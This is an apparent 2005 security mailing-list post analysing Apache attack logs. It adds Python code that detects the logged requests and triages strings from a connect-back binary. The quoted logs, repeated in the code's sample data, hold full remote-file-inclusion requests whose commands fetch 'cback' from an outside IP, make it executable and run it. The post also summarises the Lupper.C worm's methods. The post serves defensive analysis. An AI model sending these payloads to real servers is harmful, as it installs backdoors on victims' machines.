[Dshield] A Couple of New Apache Hack Patterns

jayjwa jayjwa at atr2.ath.cx
Fri Dec 16 01:47:39 GMT 2005



On Wed, 14 Dec 2005, David Cary Hart wrote:

-> 1. index2.php | index.php
-> 
-> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1"
-> 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
-> 
-> or;
-> 
-> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
-> HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
-> 5.1;)"
-> 
-> 
-> 2. POST directly to the form mail php processing page. In other words,
-> something like contact.php is passed to, and processed by
-> ContactProc.php. The would-be spammer-hacker-miscreant is trying to
-> forward mail by eliminating the form entry page.
-> 
-> The strategy I am using these days is to SWATCH the patterns -> rewrite
-> rule to hacker.php -> firewall rule. The purpose of the interim
-> hacker.php is to provide information just in case of a false positive.
-> Hacker.php then writes a unique line to access_log which swatch
-> recognizes to trigger the firewall rule.


You didn't try the mod_security? http://www.modsecurity.org/





Wow! A new linux virus? ->


cback -> Infection: Unix/Lupper.C (exact)


The last "cback" I saw was a connect-back Perl script. This is obviously an 
ELF file.


Hmmm, now that I look at it, it's little more than a mini connect proxy. It 
takes two parameters: "%s <host> <port>\n" , forks and passes on the 
connection. I'd imagine it's used by spammers to make the mail connection look 
like it's coming from another computer than what it really is. It doesn't 
have the same functionality as the one described here:


http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=47980


"Lupper.C is a worm designed to spread through web servers by exploiting two
different security vulnerabilities. This variant has been distributed as
443,364-byte I386 ELF program.


Method of Distribution

Via Exploits

Lupper attempts to execute a simple set of four commands on a remote server:

   * Change folder to /tmp
   * Use Wget to download a copy of the worm named "listen" from a particular
     hard-coded IP address
   * Modify its execution attributes
   * Execute the downloaded copy of the worm

The worm sends the above commands by exploiting the following vulnerabilities:

   * AWStats Rawlog Plugin Input Vulnerability (Bugtraq 10950)
   * XML-RPC for PHP Remote Code Execution Exploit (CAN-2005-1921) (Bugtraq
     14088)

Trying to exploit the AWStats vulnerability, the worm attempts to submit its
commands to the awstats.pl script at the following locations:

/cgi-bin/awstats/awstats.pl
/cgi-bin/awstats.pl
/awstats/awstats.pl

Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its
commands to the following scripts:

/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/drupal/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/xmlrpc.php



Payload

Backdoor Functionality

Lupper.C opens a UDP backdoor on port 27105."






This file is much smaller.

4172 cback (bytes)


md5sum:

4bc0f4d277d84577cf183d132523a620  cback




/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
connect
strerror
__strtol_internal
execl
puts
dup2
sleep
socket
inet_addr
wait
fork
__errno_location
exit
_IO_stdin_used
__libc_start_main
close
GLIBC_2.0
PTRh
ZYPhl
%s <host> <port>
socket ok
/bin/sh
error: %s
retring in 5 seconds
fork error, retyr in 5 seconds
cannot create socket, retring in 5 seconds



I got a little excited there for a second; a new Linux virus would certainly 
be something. I'm so jealous of Windows!



j
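A detector for the request patterns quoted at the top of this message, added here as an example and not code from David's SWATCH setup or from jayjwa: it parses Apache combined-format lines, splits the query string, and flags the three things the logged request combines (a `_REQUEST[...]`/`GLOBALS` override, `mosConfig_absolute_path` pointed at a remote URL, and a wget/chmod/execute chain), plus requests for the awstats.pl and xmlrpc.php paths the CA write-up lists for Lupper.C. The client IPs, timestamps and the benign and probe lines in SAMPLE_LOG are constructed; the first request target is the one quoted in the thread.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths the CA Lupper.C write-up quoted in the thread says the worm probes.
LUPPER_PATHS = {
    "/cgi-bin/awstats/awstats.pl", "/cgi-bin/awstats.pl", "/awstats/awstats.pl",
    "/xmlsrv/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/xmlrpc.php",
    "/wordpress/xmlrpc.php", "/phpgroupware/xmlrpc.php", "/drupal/xmlrpc.php",
    "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php", "/blog/xmlrpc.php",
}

# Apache combined log format; the request target runs up to the protocol token.
# \s* before HTTP/ tolerates the "echo|HTTP/1.1" form seen in the quoted log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?)\s*HTTP/[\d.]+" (?P<status>\d{3})'
)

# A remote-include value points the "absolute path" setting at another host.
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Download-then-run chain such as "wget ...;chmod ...;./something".
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(wget|curl|fetch)\b.*;\s*chmod\b|\bchmod\b.*;\s*\./",
    re.IGNORECASE | re.DOTALL,
)


def split_query(raw_query):
    """Split a raw query string on '&' and percent-decode each key and value.

    Splitting before decoding keeps an encoded '%26' inside a value from
    being mistaken for a parameter separator.
    """
    pairs = []
    for part in raw_query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((unquote(key), unquote(value)))
    return pairs


def analyze_target(target):
    """Return the sorted list of indicator names found in one request target."""
    found = set()
    parts = urlsplit(target)
    path, query = parts.path, parts.query
    if path in LUPPER_PATHS or path.endswith("/xmlrpc.php") or path.endswith("/awstats.pl"):
        found.add("lupper_probe_path")
    for key, value in split_query(query):
        # register_globals tampering: the client supplies superglobal members.
        if key.startswith(("_REQUEST[", "_GET[", "_POST[", "GLOBALS")):
            found.add("superglobal_override")
        # Mambo/Joomla-style remote file inclusion via mosConfig_absolute_path.
        if key == "mosConfig_absolute_path" and REMOTE_URL_RE.match(value):
            found.add("remote_file_include")
        if DOWNLOAD_EXEC_RE.search(value):
            found.add("download_and_execute")
    return sorted(found)


def scan_log(lines):
    """Return (client_ip, status, indicators) for every line that trips an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        indicators = analyze_target(m.group("target"))
        if indicators:
            hits.append((m.group("ip"), int(m.group("status")), indicators))
    return hits


# Constructed sample: client IPs (RFC 5737 range) and timestamps are made up.
# The first target is the request quoted in the thread; the others are a
# Lupper-style probe and a benign page view.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Dec/2005:10:00:01 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1" 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"',
    '192.0.2.11 - - [14/Dec/2005:10:00:02 -0500] "POST /xmlrpc.php HTTP/1.1" 200 512 "-" "lwp-trivial/1.41"',
    '192.0.2.12 - - [14/Dec/2005:10:00:03 -0500] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, indicators in scan_log(SAMPLE_LOG):
        print(ip, status, ",".join(indicators))
```

On its own `lupper_probe_path` is a weak signal, since xmlrpc.php serves legitimate clients; the first line trips three independent indicators, which is the kind of hit that justifies the rewrite-to-hacker.php step in the quoted message before a firewall rule is dropped in.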


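The triage the message walks through (size, md5sum, strings, then spotting socket/connect/dup2/execl and /bin/sh together) as an added example, not the poster's own script: a strings(1)-style extractor with a few substring rules that read a connect-back pattern out of a binary's import and message strings. SAMPLE_BLOB is a constructed stand-in built from the strings listed above, not the real cback file, so its size and md5 do not match the figures in the message.

```python
import hashlib
import re


def is_elf(blob):
    """True when the bytes begin with the ELF magic number."""
    return blob[:4] == b"\x7fELF"


def extract_strings(blob, min_len=4):
    """Return runs of printable ASCII of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


# Each rule fires when every token appears as a substring of some extracted string.
# These are heuristics over symbol names and messages, not a disassembly.
RULES = {
    "network_client": ("socket", "connect"),
    "fd_redirection": ("dup2",),
    "exec_shell": ("execl", "/bin/sh"),
    "forks": ("fork",),
    "retry_loop": ("sleep", "seconds"),
    "takes_host_port": ("<host> <port>",),
}


def match_rules(strs):
    """Return the sorted names of rules whose tokens are all present."""
    fired = []
    for name, tokens in RULES.items():
        if all(any(tok in s for s in strs) for tok in tokens):
            fired.append(name)
    return sorted(fired)


def triage(blob):
    """Summarise a sample: size, md5, ELF check, strings-based indicators, verdict."""
    strs = extract_strings(blob)
    fired = match_rules(strs)
    if {"network_client", "fd_redirection", "exec_shell"} <= set(fired):
        verdict = "connect-back shell or proxy: socket attached to a /bin/sh child via dup2"
    elif "network_client" in fired:
        verdict = "network client, no shell spawn seen"
    else:
        verdict = "no network indicators in strings"
    return {
        "size": len(blob),
        "md5": hashlib.md5(blob).hexdigest(),
        "is_elf": is_elf(blob),
        "indicators": fired,
        "verdict": verdict,
    }


# Constructed stand-in for the binary: an ELF magic prefix followed by the
# strings reported in the message, NUL-separated as strings(1) would see them.
SAMPLE_BLOB = b"\x7fELF\x01\x01\x01\x00" + b"\x00".join([
    b"/lib/ld-linux.so.2", b"libc.so.6", b"printf", b"connect", b"strerror",
    b"execl", b"puts", b"dup2", b"sleep", b"socket", b"inet_addr", b"wait",
    b"fork", b"exit", b"close", b"%s <host> <port>", b"socket ok", b"/bin/sh",
    b"error: %s", b"retring in 5 seconds", b"fork error, retyr in 5 seconds",
]) + b"\x00"

if __name__ == "__main__":
    report = triage(SAMPLE_BLOB)
    print(report["size"], report["md5"], report["is_elf"])
    print(",".join(report["indicators"]))
    print(report["verdict"])
```

The verdict rests on the same three facts jayjwa read off the strings: it opens a socket and connects out, it uses dup2 to point a child's file descriptors at that socket, and it runs /bin/sh; the "<host> <port>" usage string and the "retry in 5 seconds" messages only add confidence. Run against the real file the md5 and size would be the ones the message records; here they describe the constructed blob only.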